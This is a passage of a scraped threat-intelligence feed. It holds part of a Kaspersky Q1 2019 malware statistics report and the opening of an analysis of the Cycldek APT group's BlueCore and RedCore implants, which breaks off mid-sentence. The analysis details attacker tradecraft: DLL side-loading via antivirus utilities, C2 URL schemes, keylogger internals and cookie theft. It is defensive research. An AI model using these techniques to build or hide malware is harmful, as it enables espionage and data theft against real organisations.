2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171814/en-iot-ssh-map.png>)\n\nTop 10 countries in which devices were located that carried out SSH-based attacks on Kaspersky Lab's traps.\n\n| Verdict | %* \n---|---|--- \n1 | China | 23.24 \n2 | US | 9.60 \n3 | Russia | 6.07 \n4 | Brazil | 5.31 \n5 | Germany | 4.20 \n6 | Vietnam | 4.11 \n7 | France | 3.88 \n8 | India | 3.55 \n9 | Egypt | 2.53 \n10 | Korea | 2.10 \n \n_* Infected devices in the country as a percentage of the total number of infected IoT devices attacking via SSH_\n\nMost often, a successful SSH-based attack resulted in the following types of malware downloaded of victim's device: Backdoor.Perl.Shellbot.cd, Backdoor.Perl.Tsunami.gen, and Trojan-Downloader.Shell.Agent.p\n\n## Financial threats\n\n### Quarterly highlights\n\nThe banker Trojan DanaBot, detected in [Q2](<https://securelist.com/it-threat-evolution-q2-2018-statistics/87170/>), continued to grow actively. The new modification not only updated the communication protocol with the C&C center, but expanded the list of organizations targeted by the malware. Whereas last quarter the main targets were located in Australia and Poland, in Q3 organizations in Austria, Germany, and Italy were added.\n\nRecall that DanaBot has a modular structure and can load additional plugins to intercept traffic, steal passwords, and hijack crypto wallets. The malware was distributed through spam mailings with a malicious office document, which was used to download the main body of the Trojan.\n\n### Financial threat statistics\n\nIn Q1 2019, Kaspersky Lab solutions blocked attempts to launch one or more types of malware designed to steal money from bank accounts on the computers of 243,604 users.\n\n_Number of unique users attacked by financial malware, Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171934/en-finance.png>)\n\n### Attack geography\n\nTo evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country we calculated the share of users of Kaspersky Lab products that faced this threat during the reporting period out of all users of our products in that country.\n\n_Geography of banking malware attacks, Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/23125708/en-finance-map.png>)\n\n#### Top 10 countries by share of attacked users\n\n**Country*** | **%**** \n---|--- \nSouth Korea | 2.2 \nChina | 2.1 \nBelarus | 1.6 \nVenezuela | 1.6 \nSerbia | 1.6 \nGreece | 1.5 \nEgypt | 1.4 \nPakistan | 1.3 \nCameroon | 1.3 \nZimbabwe | 1.3 \n \n_* Excluded are countries with relatively few Kaspersky Lab product users (under 10,000)._ \n_** Unique users whose computers were targeted by banking Trojans as a percentage of all unique users of Kaspersky Lab products in the country._\n\n### Top 10 banking malware families\n\n| **Name** | **Verdicts** | **%*** \n---|---|---|--- \n1 | RTM | Trojan-Banker.Win32.RTM | 27.42 \n2 | Zbot | Trojan.Win32.Zbot | 22.86 \n3 | Emotet | Backdoor.Win32.Emotet | 9.36 \n4 | Trickster | Trojan.Win32.Trickster | 6.57 \n5 | Nymaim | Trojan.Win32.Nymaim | 5.85 \n6 | Nimnul | Virus.Win32.Nimnul | 4.59 \n7 | SpyEye | Backdoor.Win32.SpyEye | 4.29 \n8 | Neurevt | Trojan.Win32.Neurevt | 3.56 \n9 | NeutrinoPOS | Trojan-Banker.Win32.NeutrinoPOS | 2.64 \n10 | Tinba | Trojan-Banker.Win32.Tinba | 1.39 \n \n_** Unique users attacked by this malware as a percentage of all users attacked by financial malware._\n\nIn Q1 2019, the familiar Trojan-Banker.Win32.RTM (27.4%), Trojan.Win32.Zbot (22.9%), and Backdoor.Win32.Emotet (9.4%) made up the Top 3. In fourth place was Trojan.Win32.Trickster (6.6%), and fifth was Trojan.Win32.Nymaim (5.9%).\n\n## Ransomware programs\n\n### Quarterly highlights\n\nThe most high-profile event of the quarter was probably the [LockerGoga ransomware attack](<https://ics-cert.kaspersky.com/news/2019/03/22/metallurgical-giant-norsk-hydro-attacked-by-encrypting-malware/>) on several major companies. The ransomware code itself constitutes nothing new, but the large-scale infections attracted the attention of the media and the public. Such incidents yet again spotlight the issue of corporate and enterprise network security, because in the event of penetration, instead of using ransomware (which would immediately make itself felt), cybercriminals can install spyware and steal confidential data for years on end without being noticed.\n\nA vulnerability was discovered in the popular WinRAR archiver that allows an arbitrary file to be placed in an arbitrary directory when unpacking an ACE archive. The cybercriminals did not miss the chance to [assemble an archive](<https://www.bleepingcomputer.com/news/security/jneca-ransomware-spread-by-winrar-ace-exploit/>) that unpacks the executable file of the JNEC ransomware into the system autorun directory.\n\nFebruary saw [attacks](<https://www.bleepingcomputer.com/forums/t/691852/cr1ptt0r-ransomware-files-encrypted-readmetxt-support-topic/>) on network-attached storages (NAS), in which Trojan-Ransom.Linux.Cryptor malware was installed on the victim device, encrypting data on all attached drives using elliptic-curve cryptography. Such attacks are especially dangerous because NAS devices are often used to store backup copies of data. What's more, the victim tends to be unaware that a separate device running Linux might be targeted by intruders.\n\nNomoreransom.org partners, in cooperation with cyber police, [created](<https://threatpost.com/gandcrab-decryptor-ransomware/141973/>) a utility for decrypting files impacted by GandCrab (Trojan-Ransom.Win32.GandCrypt) up to and including version 5.1. It helps victims of the ransomware to restore access to their data without paying a ransom. Unfortunately, as is often the case, shortly after the public announcement, the cybercriminals updated the malware to version 5.2, which cannot be decrypted by this tool.\n\n### Statistics\n\n#### Number of new modifications\n\nThe number of new modifications fell markedly against Q4 2018 to the level of Q3. Seven new families were identified in the collection.\n\n_Number of new ransomware modifications, Q1 2018 \u2013 Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172044/ransomware-new-modification.png>)\n\n#### Number of users attacked by ransomware Trojans\n\nIn Q1 2019, Kaspersky Lab products defeated ransomware attacks against 284,489 unique KSN users.\n\nIn February, the number of attacked users decreased slightly compared with January; however, by March we recorded a rise in cybercriminal activity.\n\n_Number of unique users attacked by ransomware Trojans, Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172107/en-ransomware-users.png>)\n\n### Attack geography\n\nGeography of mobile ransomware Trojans, Q1 2019[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171149/en-ransomware-map.png>)\n\n#### Top 10 countries attacked by ransomware Trojans\n\n| **Country*** | **% of users attacked by cryptors**** \n---|---|--- \n1 | Bangladesh | 8.11 \n2 | Uzbekistan | 6.36 \n3 | Ethiopia | 2.61 \n4 | Mozambique | 2.28 \n5 | Nepal | 2.09 \n6 | Vietnam | 1.37 \n7 | Pakistan | 1.14 \n8 | Afghanistan | 1.13 \n9 | India | 1.11 \n10 | Indonesia | 1.07 \n \n* Excluded are countries with relatively few Kaspersky Lab users (under 50,000). \n** Unique users whose computers were attacked by Trojan cryptors as a percentage of all unique users of Kaspersky Lab products in the country.\n\n#### Top 10 most common families of ransomware Trojans\n\n| **Name** | **Verdicts*** | **Percentage of attacked users**** \n---|---|---|--- \n1 | WannaCry | Trojan-Ransom.Win32.Wanna | 26.25 | \n2 | (generic verdict) | Trojan-Ransom.Win32.Phny | 18.98 | \n3 | GandCrab | Trojan-Ransom.Win32.GandCrypt | 12.33 | \n4 | (generic verdict) | Trojan-Ransom.Win32.Crypmod | 5.76 | \n5 | Shade | Trojan-Ransom.Win32.Shade | 3.54 | \n6 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 3.50 | \n7 | PolyRansom/VirLock | Virus.Win32.PolyRansom | 2.82 | \n8 | (generic verdict) | Trojan-Ransom.Win32.Gen | 2.02 | \n9 | Crysis/Dharma | Trojan-Ransom.Win32.Crusis | 1.51 | \n10 | (generic verdict) | Trojan-Ransom.Win32.Cryptor | 1.20 | \n \n_* Statistics are based on detection verdicts of Kaspersky Lab products. The information was provided by Kaspersky Lab product users who consented to provide statistical data._ \n_** Unique Kaspersky Lab users attacked by a particular family of Trojan cryptors as a percentage of all users attacked by Trojan cryptors._\n\n## Miners\n\n### Statistics\n\n#### Number of new modifications\n\nIn Q1 2019, Kaspersky Lab solutions detected 11,971 new modifications of miners.\n\n_Number of new miner modifications, Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172216/en-miners-modifications.png>)\n\n#### Number of users attacked by miners\n\nIn Q1, we detected attacks using miners on the computers of 1,197,066 unique users of Kaspersky Lab products worldwide.\n\n_Number of unique users attacked by miners, Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172326/en-miners-users.png>)\n\n### Attack geography\n\n_Number of unique users attacked by miners, Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/23131558/en-miner-map.png>)\n\n#### Top 10 countries by share of users attacked by miners\n\n| **Country*** | **%**** \n---|---|--- \n1 | Afghanistan | 12.18 \n2 | Ethiopia | 10.02 \n3 | Uzbekistan | 7.97 \n4 | Kazakhstan | 5.84 \n5 | Tanzania | 4.73 \n6 | Ukraine | 4.28 \n7 | Mozambique | 4.17 \n8 | Belarus | 3.84 \n9 | Bolivia | 3.35 \n10 | Pakistan | 3.33 \n \n_* Excluded are countries with relatively few Kaspersky Lab users (under 50,000)._ \n_** Unique users whose computers were attacked by miners as a percentage of all unique users of Kaspersky Lab products in the country._\n\n## Vulnerable applications used by cybercriminals\n\nStatistics for Q1 2019 show that vulnerabilities in Microsoft Office are still being utilized more often than those in other applications, due to their easy exploitability and highly stable operation. The percentage of exploits for Microsoft Office did not change much compared to the previous quarter, amounting to 69%.\n\n_Distribution of exploits used by cybercriminals, by type of attacked application, Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172438/exploits.png>)\n\nThis quarter's most popular vulnerabilities in the Microsoft Office suite were [CVE-2017-11882](<https://www.trendmicro.com/vinfo/us/security/news/vulnerabilities-and-exploits/17-year-old-ms-office-flaw-cve-2017-11882-actively-exploited-in-the-wild>) and [CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>). They relate to the Equation Editor component, and cause buffer overflow with subsequent remote code execution. Lagging behind the chart leaders by a factor of almost two is [CVE-2017-8570](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570>), a logical vulnerability and an analog of the no less popular [CVE-2017-0199](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199>). Next comes [CVE-2017-8759](<https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html>), where an error in the SOAP WSDL parser caused malicious code to be injected and the computer to be infected. Microsoft Office vulnerabilities are overrepresented in the statistics partly due to the emergence of openly available generators of malicious documents that exploit these vulnerabilities.\n\nIn Q1, the share of detected vulnerabilities in browsers amounted to 14%, almost five times less than for Microsoft Office. Exploiting browser vulnerabilities is often a problem, since browser developers are forever coming up with new options to safeguard against certain types of vulnerabilities, while the techniques for bypassing them often require the use of entire vulnerability chains to achieve the objective, which significantly increases the cost of such attacks.\n\nHowever, this does not mean that in-depth attacks for browsers do not exist. A prime example is the actively exploited zero-day vulnerability [CVE-2019-5786](<https://securityaffairs.co/wordpress/82058/hacking/chrome-zero-day-cve-2019-5786.html>) in Google Chrome<https://securityaffairs.co/wordpress/82058/hacking/chrome-zero-day-cve-2019-5786.html>. To bypass sandboxes, it was [used in conjunction](<https://www.zdnet.com/article/proof-of-concept-code-published-for-windows-7-zero-day/>) with an additional exploit for the vulnerability in the win32k.sys driver ([CVE-2019-0808](<https://securityaffairs.co/wordpress/82428/hacking/cve-2019-0808-win-flaw.html>)), with the targets being users of 32-bit versions of Windows 7.\n\nIt is fair to say that Q1 2019, like the quarter before it, was marked by a large number of zero-day targeted attacks. Kaspersky Lab researchers found an actively exploited zero-day vulnerability in the Windows kernel, which was assigned the ID [CVE-2019-0797](<https://securelist.com/cve-2019-0797-zero-day-vulnerability/89885/>). This vulnerability exploited race conditions caused by a lack of thread synchronization during undocumented system calls, resulting in Use-After-Free. It is worth noting that [CVE-2019-0797](<https://securelist.com/cve-2019-0797-zero-day-vulnerability/89885/>) is the fourth zero-day vulnerability for Windows found by Kaspersky Lab recent months.\n\nA remarkable event at the beginning of the year was the discovery by researchers of the [CVE-2018-20250](<https://www.tenable.com/blog/winrar-absolute-path-traversal-vulnerability-leads-to-remote-code-execution-cve-2018-20250-0>) vulnerability, which had existed for 19 years in the module for unpacking ACE archives in the WinRAR utility. This component lacks sufficient checks of the file path, and a specially created ACE archive allows cybercriminals to inject an executable file into the system autorun directory. The vulnerability was immediately used to start distributing malicious archives.\n\nDespite the fact that two years have passed since the vulnerabilities in the FuzzBunch exploit kit (EternalBlue, EternalRomance, etc.) were patched, these attacks still occupy all the top positions in our statistics. This is facilitated by the ongoing growth of malware that uses these exploits as a vector to distribute itself inside corporate networks.\n\n## Attacks via web resources\n\n_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Malicious websites are specially created by cybercriminals; web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected._\n\n### Countries that are sources of web-based attacks:\n\n_The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky Lab products on user computers (web pages with redirects to exploits, sites containing exploits and other malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks._\n\n_To determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established._\n\nIn Q1 2019, Kaspersky Lab solutions blocked **843,096,461** attacks launched from online resources located in 203 countries across the globe. **113,640,221** unique URLs were recognized as malicious by Web Anti-Virus components.\n\n**_Distribution of web attack sources by country, Q1 2019_**[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172506/en-web-attack-source.png>)\n\nThis quarter, Web Anti-Virus was most active on resources located in the US.\n\n### Countries where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in different countries, for each country we calculated the percentage of Kaspersky Lab users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.\n\nThis rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include Web Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| **Country*** | **% of attacked users**** \n---|---|--- \n1 | Venezuela | 29.76 \n2 | Algeria | 25.10 \n3 | Greece | 24,16 \n4 | Albania | 23.57 \n5 | Estonia | 20.27 \n6 | Moldova | 20.09 \n7 | Ukraine | 19.97 \n8 | Serbia | 19.61 \n9 | Poland | 18.89 \n10 | Kyrgyzstan | 18.36 \n11 | Azerbaijan | 18.28 \n12 | Belarus | 18.22 \n13 | Tunisia | 18.09 \n14 | Latvia | 17.62 \n15 | Hungary | 17.61 \n16 | Bangladesh | 17,17 \n17 | Lithuania | 16.71 \n18 | Djibouti | 16.66 \n19 | Reunion | 16.65 \n20 | Tajikistan | 16.61 \n \n_* Excluded are countries with relatively few Kaspersky Lab users (under 10,000)._ \n_** Unique users targeted by **Malware-class** attacks as a percentage of all unique users of Kaspersky Lab products in the country._\n\nThese statistics are based on detection verdicts returned by the Web Anti-Virus module that were received from users of Kaspersky Lab products who consented to provide statistical data.\n\nOn average, 13.18% of Internet user computers worldwide experienced at least one **Malware-class** attack.\n\n**_Geography of malicious web attacks in Q1 2019 (percentage of attacked users)_**[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172633/en-web-attacks-map.png>)\n\n## Local threats\n\n_Statistics on local infections of user computers are an important indicator. They include objects that penetrated the target computer through infecting files or removable media, or initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.)._\n\n_Data in this section is based on analyzing statistics produced by Anti-Virus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media. The data includes detections of malicious programs located on user computers or removable media connected to computers, such as flash drives, camera/phone memory cards, and external hard drives._\n\nIn Q1 2019, our File Anti-Virus detected **247,907,593** malicious and potentially unwanted objects.\n\n### Countries where users faced the highest risk of local infection\n\nFor each country, we calculated the percentage of users of Kaspersky Lab products on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.\n\nNote that as of this quarter, the rating includes only **Malware-class** attacks; it does not include File Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| **Country*** | **% of attacked users**** \n---|---|--- \n1 | Uzbekistan | 57.73 \n2 | Yemen | 57.66 \n3 | Tajikistan | 56.35 \n4 | Afghanistan | 56.13 \n5 | Turkmenistan | 55.42 \n6 | Kyrgyzstan | 51.52 \n7 | Ethiopia | 49.21 \n8 | Syria | 47.64 \n9 | Iraq | 46,16 \n10 | Bangladesh | 45.86 \n11 | Sudan | 45.72 \n12 | Algeria | 45.35 \n13 | Laos | 44.99 \n14 | Venezuela | 44,14 \n15 | Mongolia | 43.90 \n16 | Myanmar | 43.72 \n17 | Libya | 43.30 \n18 | Bolivia | 43,17 \n19 | Belarus | 43.04 \n20 | Azerbaijan | 42.93 \n \n_* Excluded are countries with relatively few Kaspersky Lab users (under 10,000)._ \n_** Unique users on whose computers **Malware-class** local threats were blocked, as a percentage of all unique users of Kaspersky Lab products in the country._\n\nThese statistics are based on detection verdicts returned by the OAS and ODS Anti-Virus modules received from users of Kaspersky Lab products who consented to provide statistical data. The data includes detections of malicious programs located on user computers or removable media connected to computers, such as flash drives, camera/phone memory cards, or external hard drives.\n\nOn average, 23.62% of user computers globally faced at least one **Malware-class** local threat in Q1.", "cvss3": {}, "published": "2019-05-23T10:00:53", "type": "securelist", "title": "IT threat evolution Q1 2019. Statistics", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-0199", "CVE-2017-11882", "CVE-2017-8570", "CVE-2017-8759", "CVE-2018-0802", "CVE-2018-20250", "CVE-2019-0797", "CVE-2019-0808", "CVE-2019-5786"], "modified": "2019-05-23T10:00:53", "id": "SECURELIST:A3CEAF1114E104F14254F7AF77D7D080", "href": "https://securelist.com/it-threat-evolution-q1-2019-statistics/90916/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-03T11:50:54", "description": "\n\n## Key findings\n\nWhile investigating attacks related to a group named Cycldek post 2018, we were able to uncover various pieces of information on its activities that were not known thus far. In this blog post we aim to bridge the knowledge gap on this group and provide a more thorough insight into its latest activities and modus operandi. Here are some key insights that will be described in this publication:\n\n * Cycldek (also known as Goblin Panda and Conimes) has been active in the past two years, conducting targeted operations against governments in Southeast Asia.\n * Our analysis shows two distinct patterns of activity, indicating the group consists of two operational entities that are active under a mutual quartermaster.\n * We were able to uncover an extensive toolset for lateral movement and information stealing used in targeted networks, consisting of custom and unreported tools as well as living-off-the-land binaries.\n * One of the newly revealed tools is named USBCulprit and has been found to rely on USB media in order to exfiltrate victim data. This may suggest Cycldek is trying to reach air-gapped networks in victim environments or relies on physical presence for the same purpose.\n\n## Background\n\nCycldek is a long-known Chinese-speaking threat actor. Based on the group's past activity, it has a strong interest in Southeast Asian targets, with a primary focus on large organizations and government institutions in Vietnam. This is evident from a series of targeted campaigns that are publicly attributed to the group, as outlined below:\n\n * 2013 - indicators affiliated to the group were found in a network of a technology company operating in several sectors, as briefly [described](<https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-august-goblin-panda/>) by CrowdStrike.\n * 2014 - further accounts by CrowdStrike describe vast activity by the group against Southeast Asian organizations, most notably Vietnam. The campaigns made prominent use of Vietnamese-language lure documents, delivering commodity malware like PlugX, that was typically leveraged by Chinese-speaking actors.\n * 2017 - the group was witnessed launching attacks using RTF lure documents with political content related to Vietnam, dropping a variant of a malicious program named NewCore RAT, as [described](<https://www.fortinet.com/blog/threat-research/rehashed-rat-used-in-apt-campaign-against-vietnamese-organizations.html>) by Fortinet.\n * 2018 - attacks have been witnessed in government organizations across several Southeast Asian countries, namely Vietnam, Thailand and Laos, using a variety of tools and new TTPs. Those include usage of the Royal Road builder, developed versions of the NewCore RAT malware and other unreported implants. These were the focus of intel reports available to Kaspersky's Threat Intelligence Portal subscribers since October 2019, and will be the subject matter of this blog post.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26122651/cycldek_bridging_01.png>)\n\n**__Figure 1_: Timeline of Cycldek-attributed attacks._**\n\nMost attacks that we observed after 2018 start with a politically themed RTF document built with the 8.t document builder (also known as 'Royal Road') and sent as a phishing mail to the victims. These documents are bundled with 1-day exploits (e.g. CVE-2012-0158, CVE-2017-11882, CVE-2018-0802) which in turn run a dropper for three files:\n\n * a legitimate signed application, usually related to an AV product, e.g. QcConsol - McAfee's QuickClean utility, and wsc_proxy.exe, Avast's remediation service.\n * a malicious DLL which is side-loaded by the former application.\n * an encrypted binary which gets decrypted and executed by the DLL.\n\nThe final payload that is run in memory is malware known as NewCore RAT. It is based on an open-source framework named PcShare or PcClient that used to be prevalent in Chinese hacker forums more than a decade ago. Today, the software is fully available on [Github](<https://github.com/xdnice/PCShare>), allowing attackers to leverage and modify it for their needs.\n\nIn the case of Cycldek, the first public accounts of the group's usage of NewCore date back to 2017. As described in a blog post by Fortinet, the malware provides the attacker with broad capabilities such as conducting a range of operations on files, taking screenshots, controlling the machine via a remote shell and shutting down or restarting the system.\n\n## Two implants, two clusters\n\nWhen inspecting the NewCore RAT malware delivered during the various attacks we investigated, we were able to distinguish between two variants. Both were deployed as side-loaded DLLs and shared multiple similarities, both in code and behavior. At the same time, we noticed differences that indicate the variants could have been used by different operators.\n\nOur analysis shows that the underlying pieces of malware and the way they were used form two clusters of activity. As a result, we named the variants BlueCore and RedCore and examined the artifacts we found around each one in order to profile their related clusters. Notable characteristics of each cluster's implant are summarized in the table below.\n\n| **BlueCore** | **RedCore** | \n---|---|---|--- \nInitial Infection Vector | RTF documents | Unknown | \nLegitimate AV Utility | QcConcol.exe (McAfee's QuickClean utility) | wsc_proxy.exe (Avast's remediation application) | \nSide-Loaded DLL | QcLite.dll | wsc.dll | \nPayload Loader | stdole.tlb - contains PE loading shellcode and an encrypted BlueCore binary | msgsm64.acm -contains PE loading shellcode and and an encrypted RedCore binary | \nInjected Process | dllhst3g.exe | explorer.exe or winlogon.exe | \nConfiguration File | %APPDATA%\\desktop.ini | C:\\Documents and Settings\\All Users\\Documents\\desktop.ini or\n\nC:\\Documents and Settings\\All Users\\Documents\\desktopWOW64.ini | \nMutexes | UUID naming scheme, e.g. {986AFDE7-F299-4A7D-BBF4-CA756FC27208}, {CF94A87F-4B49-4751-8E5C-DA2D0A8DEC2F} | UUID naming scheme, e.g. {CB191C19-1D2D-45FC-9092-6DB462EFEAC6},\n\n{F0062B9A-15F8-4D5F-9DE8-02F39EBF71FB},\n\n{E68DFA68-1132-4A32-ADE2-8C87F282C457},\n\n{728264DE-3701-419B-84A4-2AD86B0C43A3},\n\n{2BCD5B61-288C-44D5-BA0D-AAA00E9D2273},\n\n{D9AE3AB0-D123-4F38-A9BE-898C8D49A214} | \nCommunicated URL Scheme | http://%s:%d/link?url=%s&enpl=%s&encd=%s | http://%s:%d/search.jsp?referer=%s&kw=%s&psid=%s\n\nor\n\nhttp://%s:%d/search.jsp?url=%s&referer=%s&kw=%s&psid=%s | \n \n_**_Table 1_: Comparison of BlueCore and RedCore loader and implant traits.** _\n\nAs demonstrated by the table, the variants share similar behavior. For example, both use DLL load order hijacking to run code from DLLs impersonating dependencies of legitimate AV utilities and both share a mutex naming convention of random UUIDs, where mutexes are used for synchronization of thread execution. By comparing code in both implants, we can find multiple functions that originate from the PCShare RAT; however, several others (like the injection code in the figure below) are proprietary and demonstrate identical code that may have been written by a shared developer.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26122817/cycldek_bridging_02.png>)\n\n**__Figure_ 2: Code similarity in proprietary injection code used in both RedCore and BlueCore implants. Code marked in yellow in BlueCore is an inlined version of the marked function in RedCore._**\n\nMoreover, both implants leverage similar injected shellcode used to load the RedCore and BlueCore implants. This shellcode, which resides in the files 'stdole.tlb' and 'msgsm64.acm', contains a routine used to decrypt the implants' raw executable from an embedded blob, map it to memory and execute it from its entry point in a new thread. Since both pieces of shellcode are identical for the two variants and cannot be attributed to any open source project, we estimate that they originate from a proprietary shared resource.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26122905/cycldek_bridging_03.png>)\n\n**__Figure 3_: Call flow graph comparison for binary decryption functions used by the shellcode in both clusters._**\n\nHaving said that, it is also evident that there are differences between the variants. The clearest distinctions can be made by looking at malware functionality that is unique to one type of implant and absent from the other. The following are examples of features that could be found only in RedCore implants, suggesting that despite their similarity with BlueCore, they were likely used by a different entity for different purposes:\n\n * _Keylogger_: RedCore records the title of the current foreground window (if it exists) and logs keystrokes each 10ms to an internal buffer of size 65530. When this buffer is filled, data from it is written to a file named 'RCoRes64.dat'. The data is encoded using a single byte XOR with the key 0xFA.\n * _Device enumerator_: RedCore registers a window class intended to intercept window messages with a callback that checks if the inspected message was sent as a result of a DBT_DEVICEARRIVAL Such events signal the connection of a device to the system, in which case the callback verifies that this device is a new volume, and if it is, it sends a bitmap with the currently available logical drives to the C&C.\n * _RDP logger_: RedCore subscribes to an RDP connection event via ETW and notifies the C&C when it occurs. The code that handles this functionality is based on a little-known Github repository named [EventCop](<https://github.com/Mandar-Shinde/EventCop>) which is intended to obtain a list of users that connected to a system via RDP. The open-source code was modified so that instead of printing the data of the incoming connection, the malware would contact the C&C and inform it about the connection event.\n * _Proxy server_: RedCore spawns a server thread that listens on a pre-configured port (by default 49563) and accepts requests from non-localhost connections. A firewall exception is made for the process before the server starts running, and any subsequent requests passed from a source to it will be validated and passed on to the C&C in their original format.\n\nPerhaps the most notable difference between the two implants is the URL scheme they use to connect and beacon their C&C servers. By looking for requests made using similar URL patterns in our telemetry, we were able to find multiple C&C servers and divide the underlying infrastructure based on the aforementioned two clusters. The requests by each malware type were issued only by legitimate and signed applications that were either leveraged to side-load a malicious DLL or injected with malicious code. All of the discovered domains were used to download further samples.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26122956/cycldek_bridging_04.png>)\n\n**__Figure 4_: Difference in URL scheme used by each implant for C2 communication._**\n\nThe conclusion that we were able to reach from this is that while all targets were diplomatic and government entities, each cluster of activity had a different geographical focus. The operators behind the BlueCore cluster invested most of their efforts on Vietnamese targets with several outliers in Laos and Thailand, while the operators of the RedCore cluster started out with a focus on Vietnam and diverted to Laos by the end of 2018. The statistics of these activities, based on the number of detected samples we witnessed downloaded from each cluster of C&Cs, are outlined in the figures below.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123040/cycldek_bridging_05.png>)\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123118/cycldek_bridging_06.png>)\n\n_**_Figure 5_: Volume of downloaded samples from C&Cs of each cluster by country and month, since mid-2018.** _\n\nFurthermore, considering both differences and similarities, we are able to conclude that the activities we saw are affiliated to a single actor, which we refer to as Cycldek. In several instances, we spotted unique tools crafted by the group that were downloaded from servers of both groups. One example of this, which can be seen in the figure below, is a tool custom built by the group named USBCulprit. Two samples of it were downloaded from both BlueCore and RedCore servers. A more comprehensive list can be found in the Appendix. All in all, this suggests the entities operating behind those clusters are sharing multiple resources \u2013 both code and infrastructure \u2013 and operating under a single organizational umbrella.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123202/cycldek_bridging_07.png>)\n\n_**_Figure 6_: Examples of proprietary malware named USBCulprit downloaded from servers of both clusters. Further examples are provided in the Appendix.** _\n\n## Info stealing and lateral movement toolset\n\nDuring the analysis, we were able to observe a variety of tools downloaded from both BlueCore and RedCore implants used for either lateral movement in the compromised networks or information stealing from infected nodes. There were several types of these tools \u2013 some were proprietary and formerly unseen in the wild; others were pieces of software copied from open-source post-exploitation frameworks, some of which were customized to complete specific tasks by the attackers.\n\nAs in the cases of RedCore and BlueCore, the downloaded tools were all invoked as side-loaded DLLs of legitimate signed applications. Such applications included AV components like wsc_proxy.exe (Avast remediation service), qcconsol.exe and mcvsshld.exe (McAfee components), as well as legitimate Microsoft and Google utilities like the resource compiler (rc.exe) and Google Updates (googleupdate.exe). These tools could be used in order to bypass weak security mechanisms like application whitelisting, grant the malware additional permissions during execution or complicate incident response.\n\nAs already mentioned, the bulk of these tools are common and widespread among attackers, sometimes referred to as living-off-the-land binaries, or LOLbins. Such tools can be part of open-source and legitimate software, abused to conduct malicious activities. Examples include BrowserHistoryView (a Nirsoft utility to obtain browsing history from common browsers), ProcDump (Sysinternals tools used to dump memory, possibly to obtain passwords from running processes), Nbtscan (command line utility intended to scan IP networks for NetBIOS information) and PsExec (Sysinternals tools used to execute commands remotely in the network, typically used for lateral movement).\n\nThe rest of the tools were either developed fully by the attackers or made use of known tools that were customized to accommodate particular attack scenarios. The following are several notable examples:\n\n * **Custom HDoor: **an old tool providing full-featured backdoor capabilities like remote machine administration, information theft, lateral movement and the launch of DDoS attacks. Developed by a hacker known as Wicked Rose, it was popular in Chinese underground forums for a while and made its way into the APT world in the form of variants based on it. One example is the [Naikon APT](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07205555/TheNaikonAPT-MsnMM1.pdf>) that made use of the original tool. \nThe custom version used by Cycldek uses a small subset of the features and the attackers used it to scan internal networks and create tunnels between compromised hosts in order to avoid network detections and bypass proxies. The tool allows the attackers to exfiltrate data from segregated hosts accessible through the local network but not connected to the internet.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123304/cycldek_bridging_08.png>)\n\n_**_Figure 7_: Command line usage of the custom HDoor tool.** _\n\n * **JsonCookies**: proprietary tool that steals cookies from SQLite databases of Chromium-based browsers. For this purpose, the sqlite3.dll library is downloaded from the C&C and used during execution to parse the database and generate a JSON file named 'FuckCookies.txt' containing stolen cookie info. Entries in the file resemble 